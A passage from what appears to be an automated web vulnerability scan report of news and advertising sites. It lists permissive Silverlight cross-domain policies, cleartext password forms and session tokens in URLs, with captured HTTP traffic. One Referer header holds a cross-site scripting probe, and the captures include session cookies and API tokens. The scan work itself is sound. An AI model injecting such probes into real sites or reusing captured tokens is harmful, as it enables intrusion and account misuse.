Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 14:06:53 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="west.thomson.com" />

...[SNIP]...
<allow-access-from domain="thelink.thomsonreuters.com" />
...[SNIP]...

5. Silverlight cross-domain policy  previous  next
There are 9 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://ad-apac.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-apac.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad-apac.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Mon, 09 May 2011 14:01:16 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.2. http://ad.au.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.au.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.au.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Mon, 14 Apr 2008 21:50:56 GMT
Date: Mon, 09 May 2011 14:02:49 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.3. http://alvenda.122.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://alvenda.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: alvenda.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:52 GMT
Server: Omniture DC/2.0.0
xserver: www56
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.4. http://f2nthevine.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://f2nthevine.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: f2nthevine.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:58 GMT
Server: Omniture DC/2.0.0
xserver: www156
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.5. http://ipcmedia.122.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ipcmedia.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ipcmedia.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:02 GMT
Server: Omniture DC/2.0.0
xserver: www265
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.6. http://irishtimesgroup.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://irishtimesgroup.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: irishtimesgroup.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:04:12 GMT
Server: Omniture DC/2.0.0
xserver: www103
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

5.7. http://pixel.33across.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.33across.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.33across.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: W/"335-1298012417000"
Last-Modified: Fri, 18 Feb 2011 07:00:17 GMT
Content-Type: application/xml
Content-Length: 335
Date: Mon, 09 May 2011 14:05:37 GMT
Connection: close
Server: 33XG1

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>
<gr
...[SNIP]...

5.8. http://s0.2mdn.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 08 May 2011 14:23:29 GMT
Expires: Fri, 06 May 2011 14:23:11 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 85055
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.9. http://secure-au.imrworldwide.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-au.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-au.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:49 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 16 May 2011 14:06:49 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

6. Cleartext submission of password  previous  next
There are 5 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


6.1. http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /news/sufjan-stevens-suffered-nervous-breakdown

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /news/sufjan-stevens-suffered-nervous-breakdown HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:30 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: SESS5079a7bd09304b581fb1d164353615c5=47u27u5frb149p678dd9853b46; expires=Wed, 01-Jun-2011 17:33:50 GMT; path=/; domain=.clashmusic.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:00:30 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 43192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<div class="content">
<form action="/news/sufjan-stevens-suffered-nervous-breakdown?destination=login_redirect" accept-charset="UTF-8" method="post" id="user-login-form">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="60" size="15" tabindex="2" class="form-text required" />
</div>
...[SNIP]...

6.2. http://www.clashmusic.com/user/a  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clashmusic.com
Path:   /user/a

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /user/a HTTP/1.1
Host: www.clashmusic.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/password37226--%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3E025ae694cc3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _jsuid=5708256774256404140; __utmz=208768448.1304949660.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-2063829282-1304949659904; SESS5079a7bd09304b581fb1d164353615c5=4ekh37vh7uaj44s5g4323l0io1; __utma=208768448.205966012.1304949660.1304949660.1304949660.1; __utmc=208768448; __utmb=208768448.6.10.1304949660

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:13:42 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Mon, 09 May 2011 14:13:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 29873

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transititional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<!-- CONTENT AREA -->
                   
                    <form action="/user/a?destination=login_redirect" accept-charset="UTF-8" method="post" id="user-login">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" size="60" tabindex="2" class="form-text required" />
<div class="description">
...[SNIP]...

6.3. http://www.floridatoday.com/odygel/lib/userauth/content/login.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /odygel/lib/userauth/content/login.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /odygel/lib/userauth/content/login.html HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; GCIONPN=AAAAOn5zZWdtZW50czpEMDg3MzRfNzAwMDh8RDA4NzM0XzcyMDc4; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 15 Nov 2010 22:45:32 GMT
Accept-Ranges: bytes
ETag: "08e11cf1685cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Content-Length: 2828

   <div class="ody-login-box clearfix">
       <a><div id="ody-login-close" class="ody-close"></div></a>
       <div class="ody-title">Log In<span class="ody-orsignup" id="ody-login-signup" >or&nbsp;<a>Sign Up<
...[SNIP]...
</div>
       <form id="ody-login-form" onsubmit="return false">
       <div class="ody-fields">
...[SNIP]...
<div class="ody-f-i"><input type="password" id="Password" name="Password" onkeypress="GDN.HandleKeyPress(event, GDN.UA.Events.Login.Click, 13);" style="width: 200px" />
                   </div>
...[SNIP]...

6.4. http://www.floridatoday.com/odygel/lib/userauth/content/signup.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.floridatoday.com
Path:   /odygel/lib/userauth/content/signup.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /odygel/lib/userauth/content/signup.html HTTP/1.1
Host: www.floridatoday.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; GCIONPN=AAAAOn5zZWdtZW50czpEMDg3MzRfNzAwMDh8RDA4NzM0XzcyMDc4; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Wed, 17 Nov 2010 21:52:00 GMT
Accept-Ranges: bytes
ETag: "0c064a9a186cb1:0"
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:37 GMT
Connection: close
Content-Length: 7620

   <div class="ody-pa-box ody-su-box clearfix">
       <a><div id="ody-signup-close" class="ody-close"></div></a>
       <div class="ody-title">Sign Up<span class="ody-orlogin" id="ody-signup-login">or <a>Log i
...[SNIP]...
</div>
           <form id="UAWidget-Registration" name="UAWidget-Registration" onsubmit="return false">
           <div id="ody-signup-main" class="ody-noerrors">
...[SNIP]...
<div class="ody-f-i"><input type="password" id="Password" name="Password" onkeypress="GDN.HandleKeyPress(event, GDN.UA.Events.Registration.RegistrationClick, 13);" size="30" /></div>
...[SNIP]...
<div class="ody-f-i"><input type="password" id="ConfirmPassword" name="ConfirmPassword" onkeypress="GDN.HandleKeyPress(event, GDN.UA.Events.Registration.RegistrationClick, 13);" size="30" /></div>
...[SNIP]...

6.5. http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thevine.com.au
Path:   /music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx HTTP/1.1
Host: www.thevine.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kxuwnfahnyntrb45nyzhom55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 269864


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
<!--googleoff: index-->


<form name="aspnetForm" method="post" action="../../content/detail.aspx?id=23458" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
...[SNIP]...
<td class="input"><input name="ctl00$HeaderNavigationControl$ctl00$Login1$Password" type="password" id="ctl00_HeaderNavigationControl_ctl00_Login1_Password" style="width:128px;" /></td>
...[SNIP]...

7. Session token in URL  previous  next
There are 7 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


7.1. http://api.brightcove.com/services/library  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://api.brightcove.com
Path:   /services/library

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /services/library?&token=f_N3PNF71c4w8kg-g49u4TbhGBRcIoWLOfzDvqnOllo.&callback=BCContextAware.callback&command=search_videos&video_fields=id,name,shortDescription,thumbnailURL&get_item_count=true&exact=false&sort_by=PLAYS_TRAILING_WEEK:DESC&page_number=0&page_size=10&any=stevens&any=sufjan&any=watching&any=illness&any=fantastic HTTP/1.1
Host: api.brightcove.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Last-Modified: Sun, 08 May 2011 06:33:56 EDT
Cache-Control: must-revalidate,max-age=0
Content-Type: application/json;charset=UTF-8
Content-Length: 4196
Date: Mon, 09 May 2011 14:04:26 GMT
Server:

BCContextAware.callback({"items":[{"id":49582897001,"name":"The Flaming Lips - 'Watching The Planets' - Video Exclusive","shortDescription":"It's naked bodies galore as everyone bares all to run, cycl
...[SNIP]...

7.2. http://l.sharethis.com/pview  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&source=share4x&publisher=4b7449a5-38e2-462a-a6cd-97326133f123&hostname=www.orlandosentinel.com&location=%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&url=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&sessionID=1304949572128.46550&fpc=23536f-12fd50e4220-5f39d80-1&ts1304949611181.0 HTTP/1.1
Host: l.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 204 No Content
Server: nginx/0.7.65
Date: Mon, 09 May 2011 14:00:18 GMT
Connection: keep-alive


7.3. http://www.apture.com/js/apture.js  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.apture.com
Path:   /js/apture.js

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /js/apture.js?siteToken=pgKiQTB HTTP/1.1
Host: www.apture.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AC=QuDxqe1K4l

Response

HTTP/1.0 200 OK
Expires: Mon, 09 May 2011 13:59:05 GMT
Last-Modified: Mon, 09 May 2011 13:59:05 GMT
Etag: "ec25c03593279e41a51488a37cd846db"
Cache-Control: max-age=0
P3p: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Content-Type: text/javascript
Content-Length: 3794
Date: Mon, 09 May 2011 13:59:05 GMT


(function(){
var B=window.apture,A=window.apture=B||{};
if(!A.isApp){
A.prefs={};A.referer="http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488
...[SNIP]...

7.4. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=c87f9494a93b2590633af39d1b8e347f&app_id=c87f9494a93b2590633af39d1b8e347f&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1882bbf1%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df13f3d1bb8%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa9baf21c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df241ffe65%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa9baf21c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3301b469%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa9baf21c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df17fe0c2e8%26origin%3Dhttp%253A%252F%252Fwww.indianasnewscenter.com%252Ff208516ccc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfa9baf21c&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3301b469&origin=http%3A%2F%2Fwww.indianasnewscenter.com%2Ff208516ccc&relation=parent&transport=postmessage&frame=fa9baf21c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.109.105
X-Cnection: close
Date: Mon, 09 May 2011 13:59:09 GMT
Content-Length: 0


7.5. http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.indianasnewscenter.com
